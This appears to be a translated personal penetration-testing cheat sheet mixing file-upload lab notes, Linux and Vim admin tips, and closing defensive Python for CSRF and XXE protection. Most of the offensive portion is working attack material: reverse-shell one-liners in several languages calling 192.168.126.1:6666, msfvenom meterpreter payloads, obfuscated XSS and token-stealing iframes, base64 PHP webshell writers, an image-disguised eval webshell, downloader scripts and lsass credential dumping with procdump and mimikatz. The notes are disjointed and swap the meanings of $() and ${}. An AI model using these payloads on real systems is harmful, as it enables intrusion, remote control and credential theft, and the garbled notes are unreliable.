It is recommended to use the environment provided by the author: download link
Some vulnerabilities have strict environment requirements.
Pass-01
When uploading a file with a .php suffix, a warning pops up without the request ever passing through BurpSuite; this means the check is done by front-end JavaScript.
XSS (Cross-Site Scripting) attack.
The defining feature of XSS is that it injects malicious code into the page shown in the user's browser, with the goal of hijacking the user's session.
It is a computer security vulnerability that frequently appears in web applications, caused by the web application filtering user input insufficiently. An attacker uses the site's vulnerability to inject malicious script code into a web page; when other users browse those pages, the malicious code executes, and the victim may be subjected to cookie theft, session hijacking, phishing and similar attacks.
1. View the page source
2. Check robots.txt
    cat flag.txt
${IFS}
Shell scripts have a variable called IFS (Internal Field Separator). The full definition is: The shell uses the value stored in IFS, which is the space, tab, and newline characters by default, to delimit words for the read and set commands, when parsing output from command substitution, and when performing variable substitution.
Bypass using hexadecimal
Execute multiple commands
    <?php
    outguess -r picture text
Spawn a bash from python
    python -c 'import pty;pty.spawn("/bin/sh")'
Allow root login over SSH
    vim /etc/ssh/sshd_config
Start the SSH service at boot
    update-rc.d ssh enable
bash_history
Copy and paste
    Copy command: Ctrl + Shift + C
    Ctrl + mouse selection, then paste: executes immediately
$() and ${}
$() is variable substitution
${} is command substitution
    useradd -d "/home/chessur" -m -s "/bin/bash" chessur
    ufw default deny   // make ports closed by default
At boot choose Advanced, press e, find `ro recovery nomodeset`, change it to `rw single init=/bin/bash`, then press F10 or Ctrl+X to enter single-user mode.
Show the output base64-encoded
    cat index.php | base64
    firewall-cmd --zone=public --add-port=80/tcp --permanent
Vim
Set a tab to four spaces
    vim /etc/vimrc
There is no my.ini, and my.cnf is empty; MySQL version 5.7.26
    vim /etc/mysql/my.cnf
Reference:
can't set secure_file_priv on mysql 5.7 Ubuntu 16.04
5.0 added information_schema
4.0 supports union
    bash -i >& /dev/tcp/192.168.126.1/6666 0>&1
    perl -e 'use Socket;$i="192.168.126.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.126.1",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    php -r '$sock=fsockopen("192.168.126.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
    ruby -rsocket -e'f=TCPSocket.open("192.168.126.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    nc -e /bin/sh 192.168.126.1 6666
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.1 6666 >/tmp/f
    r = Runtime.getRuntime()
Reverse shell hidden in an image
Tool: https://github.com/peewpw/Invoke-PSImage
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.1 LPORT=6666 -f psh-reflection -o /root/image_shell.ps1
    weevely generate Windy /root/windy.php
Set a static IP in bridged mode
1. Select the network adapter in VMware
2. Edit the configuration file
    vim /etc/network/interfaces
    javascript:alert(1)
Null byte
    <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+")"+"\"")())()</script>
URL-encoded form
    <script>eval('
Obtain the user_token
    <iframe src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>
Write a one-line webshell
    <?php echo `echo PD9waHAgQGV2YWwoJF9QT1NUWydXaW5keSddKT8+|base64 -d > upload/1.php` ;?>
    <?php fputs(fopen('./Windy.php','w'),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbV2luZHldKTs/Pg=='));?>
One-liner that writes an upload shell
    ?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(...)));
    <?php
    <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; eval($_POST[Windy]); __halt_compiler(); ?></h1>
Execute a command to get a reverse shell; supports PHP and Python
    use exploit/multi/script/web_delivery
Generate a PHP reverse shell
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.126.126 lport=126 -f raw -o reverse_shell.php
Add a route (inside meterpreter)
    run autoroute -s 192.168.126.0/24
Scan for live hosts
    use auxiliary/scanner/discovery/arp_sweep
SOCKS proxy
    use auxiliary/server/socks4a
msfvenom
    -e   encoder
1. Install zsh
2. Create ~/.oh-my-zsh/custom/plugins/msfvenom
3. Put the script in the directory above
4. Edit the zsh configuration file
    vim ~/.zshrc
5. Reload zsh: source ~/.zshrc
Upgrade a command shell to a meterpreter shell
    Ctrl + Z
Import a database from the command line
    mysql -uroot -pPassword databasename < filedir
Modify the template code
Change the allowed upload image formats
If uploaded templates are extracted automatically, a zip archive can be uploaded
A webshell's privileges are generally determined by the privileges of the web container that parses and executes it.
On a Linux host with OS hardening, if you can upload and can only execute system commands with that permission level but cannot obtain a shell, then directory permission hardening was done, but middleware hardening was not (upload is possible) and OS hardening was not.
Directory hardening means the permissions are readable and executable but not writable.
    echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
    bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg
    pr.exe "net user chessur 123.com /add"   // add a user
A computer intrusion technique whose targets are usually a specific group (an organization, industry, region, etc.). The attacker first determines, by guessing or observation, which websites the group visits frequently, compromises one or more of them and plants malware, so that eventually some members of the target group are infected.
Social network
Blog
Salary bank account
Software used by the company
Business partners
Sales bank account
Job openings
    var code = '\u003c'
Windows' own dump extraction tool, which is not killed by antivirus
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then view it with mimikatz
    sekurlsa::minidump lsass.dmp
Tested on Win10 Build 17763: mimikatz could not read it
Works on WinXP
at
Block selection: Ctrl+V
Set a tab to four spaces
    vim /etc/vim/vimrc
For files already saved, the following commands convert between spaces and tabs
Replace tabs with spaces
    :set ts=4
Replace spaces with tabs
    :set ts=4
Add the setting
    git config --global http.proxy IP:port
Remove the setting
    git config --global --unset http.proxy
Requirement:
XDebug must be configured
Purpose:
Enables PHP debugging
Requirement:
PHP 7.0 or later configured in the environment variables
Purpose:
Autocompletion
Shows the parameters a function requires
Jump to function definition
Search for function calls
CSRF (Cross-Site Request Forgery) is a web attack also known as a "One Click Attack" or Session Riding, usually abbreviated CSRF or XSRF.
A CSRF vulnerability exists because the web application, when the user performs a sensitive operation such as changing the account password, adding an account or transferring money, does not validate a form token or the Referer value in the HTTP request headers, which lets an attacker complete the action using an ordinary user's identity (cookie).
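The two server-side checks named above, a session-bound form token and an Origin/Referer host check, as an added example (not code from the original notes). The host name bank.example, the key and the session ids are constructed for the example.

```python
import hmac
import hashlib
import secrets
from urllib.parse import urlsplit

# Server-side key used to derive per-session tokens (constructed here;
# a real deployment loads it from configuration).
SERVER_KEY = secrets.token_bytes(32)
OWN_HOST = "bank.example"  # hypothetical host of the protected site


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the form: HMAC(key, session id), so it is bound to
    one session and cannot be produced or guessed by another origin."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def request_is_genuine(headers: dict, form: dict, session_id: str) -> bool:
    """Apply both checks to a sensitive request (password change, transfer).
    `headers` and `form` are plain dicts standing in for the framework's
    request objects; `session_id` comes from the authenticated session."""
    # Check 1: the form token must match the token issued for this session.
    expected = issue_csrf_token(session_id)
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return False  # missing or foreign token: not submitted from our form

    # Check 2: the browser-set Origin header (Referer as fallback) must name
    # our own host; a cross-site page cannot forge either header.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # strict: sensitive actions require a verifiable source
    return urlsplit(source).hostname == OWN_HOST
```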
An XML External Entity (XXE) attack is an application-layer attack whose precondition is that the application parses XML. XXE typically occurs when user-supplied XML input contains a reference to an external entity and a misconfigured XML parser resolves that entity. From the perspective of the host running the parser, the attack can lead to disclosure of confidential information, denial of service, server-side request forgery, port scanning and other effects on the system.
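The parser-side fix for the misconfiguration described above, as an added example (not code from the original notes): an expat parser that refuses every entity declaration and external reference, shown against constructed benign, external-entity and entity-expansion documents. The file path in the sample is a placeholder.

```python
import xml.parsers.expat as expat


class XXEBlocked(ValueError):
    """Raised as soon as the document declares any entity."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML into {element name: text}, refusing entity declarations and
    external references so the parser never reads files, fetches URLs or
    expands nested entities on the document's behalf."""
    parser = expat.ParserCreate()
    # Never read an external DTD subset or process parameter entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    texts, stack = {}, []

    def entity_decl(name, is_pe, value, base, system_id, public_id, notation):
        # Fires for internal and external entities alike: abort the parse.
        raise XXEBlocked(f"entity declaration rejected: {name!r}")

    def external_ref(context, base, system_id, public_id):
        return 0  # refuse resolution; expat then fails with an ExpatError

    def start(name, attrs):
        stack.append(name)
        texts.setdefault(name, "")

    def chars(text):
        if stack:
            texts[stack[-1]] += text  # expat delivers text in chunks

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return texts


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except (XXEBlocked, expat.ExpatError):
        return True
    return False


# Constructed sample documents (the file path is a placeholder).
BENIGN_DOC = b"<user><name>alice &amp; bob</name></user>"
XXE_DOC = (b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY x SYSTEM "file:///tmp/placeholder.txt">]>'
           b"<user><name>&x;</name></user>")
ENTITY_DOS_DOC = (b'<!DOCTYPE d [<!ENTITY a "aaaaaaaaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
                  b"<user><name>&b;</name></user>")
```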